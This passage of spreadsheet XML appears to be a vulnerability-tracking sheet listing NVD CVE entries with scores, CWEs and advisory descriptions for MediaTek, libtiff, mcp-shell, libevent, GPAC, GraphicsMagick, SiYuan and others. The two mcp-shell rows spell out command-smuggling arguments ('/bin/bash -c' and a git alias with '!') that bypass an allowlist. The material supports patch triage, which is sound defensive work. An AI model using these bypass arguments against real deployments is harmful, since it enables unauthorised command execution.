      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9197.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20501</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20502</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9196.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20502</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52491</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the libtiff/tools/thumbnail.c: main() component</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52491</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55581</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-183, CWE-78</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowed_executables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell command-mode flag -c. A caller of the shell_exec MCP tool can provide the command argument `/bin/bash -c &lt;arbitrary-command&gt;`, which passes validation and reaches executor.go, where parseCommand and exec.CommandContext execute the arbitrary command as mcpuser outside the intended allowlist. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55581</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55582</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default security.yaml allows /usr/bin/git, while security.go omits ! from containsShellMetacharacters and containsDangerousShellConstructs and applies no per-executable argument policy. A caller of the shell_exec MCP tool can provide the command argument /usr/bin/git -c alias.pwn=!&lt;arbitrary-command&gt;, causing Git to create a shell alias and execute arbitrary OS commands as the mcp-shell process user. The default Docker image runs as mcpuser with Git installed and secure mode enabled, so the bypass is exploitable in the default deployment without additional authentication beyond MCP connectivity. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55582</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63388</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-617, CWE-787</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has a heap out-of-bounds write in bufferevent_sock.c when bufferevent_socket_set_conn_address_ copies a kernel-supplied AF_UNIX peer address into bufferevent_private.conn_address. Release builds compiled with NDEBUG disable the EVUTIL_ASSERT length guard, and the evhttp accept path can pass a 110-byte sockaddr from accept() into the 28-byte field. An unauthenticated local peer able to connect to an AF_UNIX listener can overwrite the adjacent dns_request pointer and heap data, causing memory corruption with confidentiality, integrity, and availability impact. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63388</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71612</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the nhntdmx_process() function. Fixed in fac50e6a12ac27ffabdd5d3080b51afcc44ad8d6.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71612</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71614</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>An issue in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the src/media_tools/dvb_mpe.c, descriptorTime_slice_fec_identifier() and gf_m2ts_ipdatagram_reader() components. Fixed in 0e4093392e1f847c90d20e031e893cd942fef938.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71614</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77118</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>22e2d327-25fe-45d7-9f0c-dcd23b7108df</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds write exists in the Photo CD (PCD) decoder of GraphicsMagick. In DecodeImage() (coders/pcd.c), the Huffman delta loop advances its output pointer with q++ after every decoded delta and never checks it against the end of the heap-allocated luma/chroma plane buffers. The pointer is repositioned only when a sync marker introduces a new plane/row; between sync markers the run length is bounded solely by the input.
A crafted PCD file that positions the pointer near the end of a plane and then supplies a long run of deltas with no intervening sync therefore walks the pointer past the end of the allocation and writes through it. Processing an untrusted PCD file — for example with gm convert or gm identify, or through any application linked against libGraphicsMagick — can corrupt heap memory beyond the buffers.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77118</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82563</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>An attacker could impersonate the camera and place themselves in a man-in-the-middle or device-emulation position. This permits manipulation of device status responses, observation of application requests, and potential triggering of firmware-update behavior.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82563</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86502</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing TLS and authentication on the IJent gRPC server allowed local code execution on Remote Development hosts</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86502</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86741</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to sanitize the category EULA text field before rendering it in checkout confirmation emails. Attackers with low-privilege permissions can inject markdown image syntax or raw HTML img tags pointing to local files or remote URLs, which the mail auto-embed library resolves server-side and returns as email attachments, exfiltrating sensitive files like .env credentials and enabling SSRF attacks.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86741</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87794</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>bestzip versions 2.2.6 and 3.0.2 contain an argument injection vulnerability in the nativeZip function that allows attackers to inject arbitrary arguments to the Info-ZIP backend. Attackers can supply a malicious destination path combined with crafted source entries to execute arbitrary commands with Node.js process privileges. Fixed in 2.2.7 and 3.0.3.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87794</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87811</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 inserts persisted notebook template paths into HTML input value attributes without proper attribute encoding. Attackers can craft malicious template paths that break out of the attribute context and execute JavaScript when a victim opens notebook configuration, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87811</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87813</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the Search Assets result list where asset filenames are interpolated into HTML without escaping. Authenticated attackers can craft asset filenames containing malicious markup that executes JavaScript in the victim's browser when searching assets, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87813</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87815</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path traversal vulnerability in the /api/riff/removeRiffDeck endpoint that fails to validate the deckID parameter. An authenticated administrator can supply path traversal sequences to delete arbitrary .deck and .cards files outside the workspace directory.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87815</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29988</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
